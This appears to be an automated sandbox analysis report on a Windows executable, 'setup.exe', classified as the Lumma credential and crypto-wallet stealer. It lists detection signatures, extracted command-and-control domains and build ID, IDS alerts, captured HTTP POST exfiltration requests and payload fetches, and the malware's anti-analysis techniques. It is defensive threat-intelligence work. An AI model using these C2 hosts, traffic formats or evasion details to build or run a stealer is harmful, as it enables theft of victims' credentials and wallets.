Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1584823
MD5: 86a4951d8e5a083679b90f2509f215fe
SHA1: 426588739b61c2af6b584bfda1a571a9ee991ef7
SHA256: 56ba7331a6db894aa092ecfc8bf691ae04ba7e5c6b4e3ba1067e67ce43f5e673
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Infostealer behavior detected
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • setup.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 86A4951D8E5A083679B90F2509F215FE)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nearycrepso.shop", "noisycuttej.shop", "regularlavhis.click", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--ALFA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x51f1f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: setup.exe PID: 7468 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: setup.exe PID: 7468 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: setup.exe PID: 7468 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: setup.exe PID: 7468 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T15:40:22.509497+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:23.593631+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.678803+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:26.058271+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:27.378073+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:28.816189+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:29.767356+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:30.831235+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:32.095620+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | TCP
2025-01-06T15:40:23.125271+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.062654+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:31.320736+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:23.125271+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:24.062654+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-06T15:40:25.482275+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 104.21.96.1 | 443 | TCP

AV Detection

Source: https://regularlavhis.click/VISc | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/Mi | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/bu | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/api$ | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/api | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/piGW | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/Y | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/jh | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/ob | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/apih | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/bub | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtf1 | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/pi: | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/la | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/laK | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/pi | Avira URL Cloud: Label: malware
Source: regularlavhis.click | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/Mi6a | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtebKit/537.36 | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/apiP | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/ | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtk | Avira URL Cloud: Label: malware
Source: https://cegu.shop/2 | Avira URL Cloud: Label: malware
Source: https://regularlavhis.click/jhP | Avira URL Cloud: Label: malware
Source: setup.exe.7468.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "noisycuttej.shop", "regularlavhis.click", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "hRjzG3--ALFA"}
Source: setup.exe | ReversingLabs: Detection: 13%
Source: setup.exe | Virustotal: Detection: 10%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.3% probability
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: regularlavhis.click
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.4141992190.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--ALFA
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_03018664 CryptUnprotectData, 0_2_03018664
Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\MultiCommander\BuildOutput\Output\Win32\Release v143\MultiUpdate\MultiUpdate.pdb | source: setup.exe
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C8805D FindFirstFileExW, 0_2_00C8805D
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C2C2ED GetFileAttributesW, FindFirstFileExW, GetLastError, FindFirstFileExW, FindFirstFileExW, GetLastError, FindClose, GetFileAttributesW, GetLastError, FindFirstFileExW, FindNextFileW, 0_2_00C2C2ED
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C3C97F SetLastError, FindFirstFileW, GetLastError, 0_2_00C3C97F
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C3CAC7 GetModuleHandleW, GetProcAddress, FindFirstFileW, 0_2_00C3CAC7
Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C40F9D __EH_prolog3_GS, GetFullPathNameW, PathIsUNCW, GetVolumeInformationW, CharUpperW, FindFirstFileW, FindClose, 0_2_00C40F9D

Networking

Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49749 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49751 -> 104.21.96.1:443
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: regularlavhis.click
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | IP Address: 185.161.251.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 78
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1NOJGNEGR5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18114
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MI2ER9LNNQ37X
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8753
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EKN0MGNIX3D
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20394
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=S5OQLYS040ZL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1212
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CKYY1BGZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1042
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 113
    Host: regularlavhis.click
Source: global traffic | HTTP traffic detected:
    GET /8574262446/ph.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: cegu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /8574262446/ph.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: cegu.shop
Source: global traffic | DNS traffic detected: DNS query: regularlavhis.click
Source: global traffic | DNS traffic detected: DNS query: cegu.shop
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: regularlavhis.click
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C12032 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strncpy,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00C12032
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C12032 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strncpy,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00C12032
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C11FA0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_00C11FA0
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C12626 GetFocus,GetKeyState,GetKeyState,GetKeyState,InvalidateRect | 0_2_00C12626
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00C31419 GetKeyState,GetKeyState,GetKeyState,SendMessageW | 0_2_00C31419

              System Summary

              Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 | Author: unknown
              Source: C:\Users\user\Desktop\setup.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_01073735 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread | 0_2_01073735
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102E7B90_2_0102E7B9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010546D00_2_010546D0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104C9030_2_0104C903
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010649E20_2_010649E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102A8420_2_0102A842
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102AB020_2_0102AB02
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01056BC50_2_01056BC5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105CA420_2_0105CA42
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103EA520_2_0103EA52
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103AD670_2_0103AD67
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01028DB20_2_01028DB2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01064DE20_2_01064DE2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104CC370_2_0104CC37
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01050C960_2_01050C96
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105CCA20_2_0105CCA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01040F820_2_01040F82
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102AF920_2_0102AF92
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103EE620_2_0103EE62
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010251220_2_01025122
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102F1640_2_0102F164
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010610220_2_01061022
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010650E20_2_010650E2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103F3020_2_0103F302
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105D3720_2_0105D372
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010513AD0_2_010513AD
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010653B20_2_010653B2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010332960_2_01033296
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010272F20_2_010272F2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010515340_2_01051534
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103F5620_2_0103F562
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010575A50_2_010575A5
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0105D5C20_2_0105D5C2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0104541B0_2_0104541B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0103D9F00_2_0103D9F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010438B20_2_010438B2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01027B520_2_01027B52
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01047B880_2_01047B88
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01047A3B0_2_01047A3B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01053A950_2_01053A95
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01025AD20_2_01025AD2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01059AE60_2_01059AE6
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0102DAF80_2_0102DAF8
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01057D4A0_2_01057D4A
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01043DA20_2_01043DA2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01033DD20_2_01033DD2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01049F720_2_01049F72
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01027FE20_2_01027FE2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0300C3060_2_0300C306
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030287800_2_03028780
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030125E00_2_030125E0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030088500_2_03008850
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0302E87F0_2_0302E87F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030431F00_2_030431F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030410920_2_03041092
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_030097A00_2_030097A0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0303BB800_2_0303BB80
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_03043BC00_2_03043BC0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0300D9720_2_0300D972
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0303BDD00_2_0303BDD0
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C1C288 appears 48 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 01036362 appears 113 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C475DC appears 163 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C4E010 appears 55 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 01029852 appears 75 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C150E8 appears 43 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C4C7F0 appears 39 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C476C0 appears 66 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C4760F appears 89 times
              Source: C:\Users\user\Desktop\setup.exe | Code function: String function: 00C1EBE3 appears 36 times
              Source: setup.exe | Static PE information: invalid certificate
              Source: setup.exe | Binary or memory string: OriginalFileName vs setup.exe
              Source: setup.exe, 00000000.00000000.1683707324.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exe, 00000000.00000003.1875392084.00000000031E7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe, 00000000.00000003.1875392084.00000000031E7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exe, 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe, 00000000.00000000.1683674227.0000000000C96000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe | Binary or memory string: \StringFileInfo\%04X%04X\FileVersionInternalNameLegalCopyrightOriginalFileNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuild%d.%d.%d.%d%d.%d.%d vs setup.exe
              Source: setup.exe | Binary or memory string: OriginalFilenameMultiUpdate.exeX vs setup.exe
              Source: setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
